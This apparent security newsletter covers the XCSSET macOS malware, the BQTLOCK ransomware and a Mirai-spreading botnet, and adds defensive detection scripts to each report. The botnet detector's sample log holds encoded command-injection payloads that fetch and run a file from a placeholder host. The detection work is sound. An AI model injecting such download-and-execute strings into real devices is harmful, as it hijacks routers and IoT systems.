Update: XCSSET Malware Evolves with New Stealth and Theft Capabilities
Microsoft researchers report a new variant of the XCSSET macOS malware that continues to target developers by infecting Xcode projects, which are frequently shared and cloned between teams. The infection chain begins with a compromised Xcode project or cloned repository; when the developer builds it, XCSSET executes embedded scripts that fetch additional modules from attacker servers. Those modules harvest browser-stored secrets, capture clipboard data and replace it with attacker-controlled cryptocurrency addresses, and pull down run-only AppleScripts that execute covertly; a new module targets Firefox data in addition to other browsers. The implant conceals its activity through encryption and obfuscation and uses ad-hoc signing and temporary files to evade casual detection. Persistence is achieved through LaunchDaemon entries and a disguised fake app that relaunches the payload across reboots, and the malware deliberately disables macOS automatic security updates to lengthen its window of access.

Key indicators include unusual processes or scripts running during Xcode builds, unexpected network connections from development machines to unknown domains, and new or modified files in /tmp, /Users/Shared, or developer build folders. Look for LaunchDaemon plist entries with unfamiliar names, a ~/.root or similarly hidden payload file, and fake applications created in /tmp that launch at user login. Microsoft has observed these changes in limited attacks and has worked with Apple and GitHub to remove related repositories; the campaign nevertheless highlights that developers remain an attractive target for malware operators.
Keeping macOS patched, validating shared Xcode projects, and monitoring for clipboard tampering or suspicious persistence files are critical defensive steps.
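One way to hunt for the persistence indicators listed above is to parse every launchd plist and flag jobs that execute from /tmp or /Users/Shared, run a hidden file in a home directory, or invoke osascript. This is an added example, not Microsoft's or Apple's tooling; the sample plists and the com.example.* labels are constructed.

```python
"""Audit launchd plists for the XCSSET persistence indicators listed above.
Added example, not Microsoft's or Apple's tooling; the sample plists and the
com.example.* labels are constructed for illustration."""
import plistlib
import re
from pathlib import Path

# Directories the write-up ties to staged payloads and fake apps.
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/Users/Shared/")
# A hidden file directly under a user's home directory, e.g. /Users/dev/.root
HIDDEN_HOME_FILE = re.compile(r"^/Users/[^/]+/\.[^/]+$")

def audit_plist(label: str, data: bytes) -> list:
    """Return the reasons a launchd plist matches the indicators (empty if none)."""
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # an unparseable plist in a launchd folder is itself odd
        return [f"{label}: unparseable plist ({exc})"]
    targets = [plist.get("Program"), *(plist.get("ProgramArguments") or [])]
    targets = [t for t in targets if isinstance(t, str)]
    findings = []
    for t in targets:
        if t.startswith(STAGING_DIRS):
            findings.append(f"{label}: executes from staging dir: {t}")
        if HIDDEN_HOME_FILE.match(t):
            findings.append(f"{label}: executes hidden home-dir file: {t}")
    if targets and Path(targets[0]).name == "osascript":
        findings.append(f"{label}: launches osascript (run-only AppleScript?)")
    return findings

def audit_dir(directory: str) -> dict:
    """Map every *.plist in a launchd folder (e.g. /Library/LaunchDaemons) to findings."""
    return {p.name: audit_plist(p.name, p.read_bytes())
            for p in Path(directory).glob("*.plist")}

# Constructed samples mimicking the described pattern; not real malware artefacts.
SUSPECT = plistlib.dumps({
    "Label": "com.example.update",
    "ProgramArguments": ["/usr/bin/osascript", "/Users/dev/.root"],
    "RunAtLoad": True,
})
BENIGN = plistlib.dumps({
    "Label": "com.example.backup",
    "ProgramArguments": ["/usr/local/bin/backup", "--nightly"],
})

if __name__ == "__main__":
    for name, blob in (("suspect", SUSPECT), ("benign", BENIGN)):
        print(name, audit_plist(name, blob) or "clean")
```

Run audit_dir against /Library/LaunchDaemons, /Library/LaunchAgents and each user's ~/Library/LaunchAgents; any finding is a starting point for review, not proof of infection.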
BQTLOCK Ransomware Attacking Windows Users Via Telegram
Researchers have discovered a new RaaS strain called BQTLOCK, which is actively distributed through Telegram channels and dark web forums. Affiliates spread the malware via malicious ZIP archives containing an Update.exe executable that encrypts files under 50 MB, appends a “.bqtlock” extension, and deletes backups to block recovery. The ransomware uses AES-256 to encrypt file content, with RSA-4096 securing the keys, and drops a ransom note demanding 13 to 40 Monero (approximately $3,600 to $10,000) within 48 hours. Victims are instructed to contact attackers through Telegram or X, with ransom demands doubling if deadlines are not met and decryption keys destroyed after seven days. To evade detection, BQTLOCK employs anti-analysis measures, including string obfuscation, debugger checks, and virtual machine evasion stubs, while gathering system information and exfiltrating it via a Discord webhook. It further escalates privileges using CMSTP, fodhelper.exe, and eventvwr.exe, creates a local administrator account named “BQTLockAdmin,” and injects into explorer.exe for stealth. Beyond encryption, BQTLOCK terminates antivirus and backup processes, establishes persistence with a scheduled task named SystemHealthCheck, and alters wallpapers and file icons via registry modifications.

The RaaS model offers Starter, Professional, and Enterprise tiers, with a builder interface that allows affiliates to customize ransom notes, extensions, and anti-analysis features without requiring technical knowledge. The latest version of the builder, released in August, added credential theft modules for popular browsers, improved obfuscation, and new UAC bypass methods. Despite claims by its operators, led by an individual known as ZeroDayX, that the malware is fully undetectable, samples showed limited submissions on VirusTotal and some corrupted builds.
Operators continue to expand their presence by reopening blocked Telegram channels and launching BAQIYAT[.]osint, a paid service for searching stolen data. Mitigation requires organizations and individuals to maintain offline or immutable backups, monitor for unauthorized administrator accounts and scheduled tasks, enforce least-privilege principles, and deploy advanced endpoint protections capable of detecting process hollowing and privilege escalation attempts.
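The host-side indicators above (the BQTLockAdmin account, the SystemHealthCheck task, and the .bqtlock extension) translate directly into triage logic. The following is an added example, not the researchers' tooling; the event records are constructed, and the field names are an assumed normalised schema rather than raw Windows event fields.

```python
"""Triage host telemetry for the BQTLOCK indicators named above: the BQTLockAdmin
local administrator account, the SystemHealthCheck scheduled task, and bursts of
files renamed to a '.bqtlock' extension. Added example, not the researchers' tooling;
the event dicts are constructed and their field names are an assumed normalised schema."""

ADMIN_ACCOUNT = "BQTLockAdmin"
TASK_NAME = "SystemHealthCheck"
RANSOM_EXT = ".bqtlock"

def triage_events(events) -> list:
    """Return alert strings for account-creation and scheduled-task indicators."""
    alerts = []
    for e in events:
        kind = e.get("kind")
        if kind == "account_created":
            who = e.get("account", "")
            if who == ADMIN_ACCOUNT:
                alerts.append(f"known BQTLOCK account created: {who}")
            elif e.get("group") == "Administrators":
                alerts.append(f"unexpected local admin created: {who}")
        elif kind == "task_created" and e.get("task") == TASK_NAME:
            alerts.append(f"suspicious scheduled task {TASK_NAME} by {e.get('user')}")
    return alerts

def rename_burst(renames, threshold: int = 5, window_s: int = 60) -> bool:
    """True when at least `threshold` files gain RANSOM_EXT within any window_s span.
    renames: (epoch_seconds, new_path) pairs in any order."""
    times = sorted(t for t, path in renames if path.lower().endswith(RANSOM_EXT))
    lo = 0
    for hi in range(len(times)):
        while times[hi] - times[lo] > window_s:  # slide the window start forward
            lo += 1
        if hi - lo + 1 >= threshold:
            return True
    return False

# Constructed sample telemetry, not captured from a real host.
SAMPLE_EVENTS = [
    {"kind": "account_created", "account": "BQTLockAdmin", "group": "Administrators"},
    {"kind": "task_created", "task": "SystemHealthCheck", "user": "SYSTEM"},
    {"kind": "task_created", "task": "Nightly Backup", "user": "alice"},
]
SAMPLE_RENAMES = [(1000 + i, f"C:\\Users\\alice\\Docs\\f{i}.docx.bqtlock") for i in range(6)]

if __name__ == "__main__":
    for alert in triage_events(SAMPLE_EVENTS):
        print("ALERT:", alert)
    print("encryption burst:", rename_burst(SAMPLE_RENAMES))
```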
Loader-as-a-Service Botnet Exploits Routers and IoT for Mirai Deployment
CloudSEK has uncovered a botnet operation offering “Loader-as-a-Service,” which has been active for six months and is rapidly growing. The operators compromise SOHO routers, embedded Linux devices, and enterprise applications through unsanitized POST parameters (NTP, syslog, hostname), default credentials, and known CVEs in WebLogic, WordPress, and vBulletin. Exposed C2 panel logs revealed the attack flow, which included brute force and credential spraying against web interfaces, injection of shell commands using wget or BusyBox to fetch droppers, and reconnaissance collection of firmware and MAC data before payload staging. From July to August 2025, the attack volume increased by 230%, with delivery of multi-architecture Morte binaries, cryptominers, and Mirai-based DDoS bots. Redundant delivery infrastructure across multiple IPs ensures persistence despite takedowns. Enterprises face exploitation of WebLogic and Struts2 components for deeper intrusion and potential ransomware staging. Edge routers are vulnerable to hijacking for DDoS attacks, DNS tampering, or NTP manipulation, which can degrade bandwidth and uptime. Small businesses and IoT devices are weaponized as stepping stones against larger targets, expanding the attacker’s reach.

Indicators include POST requests with embedded shell commands (wget, curl, |sh), outbound connections over TFTP/FTP from IoT networks, unexplained JSON-RPC traffic tied to miners, and processes spawning from /tmp/morte.*. Defenders should enforce egress controls, patch exposed services, disable unnecessary remote management, and segment IoT from production networks. SOC teams should prioritize detection rules for download-and-execute chains, monitor shell command logs and process trees for anomalies, and isolate devices exhibiting mining or Mirai activity.
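A detection rule for the download-and-execute chains described above can be as simple as decoding each POST parameter and looking for a shell separator followed by a fetch tool or a pipe into a shell. This is an added example, not CloudSEK's tooling; the log line format, parameter names and request bodies are constructed, using documentation IP ranges only.

```python
"""Flag IoT/router web-interface POST requests whose form parameters carry
a download-and-execute chain, the indicator described above. Added example,
not CloudSEK's tooling; the log format, parameter names and request bodies
are constructed for illustration (documentation IP ranges only)."""
import re
from urllib.parse import parse_qs, unquote_plus

# Fields the write-up names as commonly unsanitized on SOHO devices.
WATCHED_PARAMS = {"ntp", "ntp_server", "syslog", "syslog_server", "hostname"}
# A shell separator followed by a fetch tool, or a pipe into a shell.
CMD_PATTERN = re.compile(
    r"[;&|`$(]\s*(?:wget|curl|busybox|tftp|ftpget)\b|\|\s*(?:sh|bash|ash)\b",
    re.IGNORECASE,
)

def inspect_body(body: str) -> list:
    """Return (param, decoded_value, severity) for values matching CMD_PATTERN."""
    hits = []
    for param, values in parse_qs(body, keep_blank_values=True).items():
        for v in values:
            v = unquote_plus(v)  # second decode catches double-encoded payloads
            if CMD_PATTERN.search(v):
                sev = "high" if param.lower() in WATCHED_PARAMS else "medium"
                hits.append((param, v, sev))
    return hits

def scan_log(lines) -> list:
    """Scan constructed lines of the form 'src_ip METHOD path body'."""
    alerts = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 4 or parts[1] != "POST":
            continue
        src, _, path, body = parts
        for param, value, sev in inspect_body(body):
            alerts.append(f"{sev}: {src} {path} param={param} value={value!r}")
    return alerts

# Constructed sample traffic; the second and third lines mimic the pattern.
SAMPLE_LOG = [
    "203.0.113.7 POST /apply.cgi ntp_server=pool.example.org",
    "203.0.113.9 POST /apply.cgi ntp_server=1.2.3.4%3Bwget+http%3A%2F%2F198.51.100.5%2Fx+-O+%2Ftmp%2Fx%3Bsh+%2Ftmp%2Fx",
    "203.0.113.9 POST /setup.cgi hostname=rt%60curl+198.51.100.5%2Fm%7Csh%60",
    "203.0.113.11 GET /status.cgi -",
]

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Hits in the named parameters are rated high because those fields are typically passed straight to the device's shell; a match elsewhere still deserves a look.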
Top CVEs of the Week
As part of our ongoing vulnerability monitoring, the following CVEs highlight recent security issues that could affect a range of systems, applications, and devices. These findings reflect the constantly evolving threat landscape and reinforce the importance of timely patching, secure configurations, and proactive security practices. Below is a summary of notable vulnerabilities, including their impact and any available remediation guidance.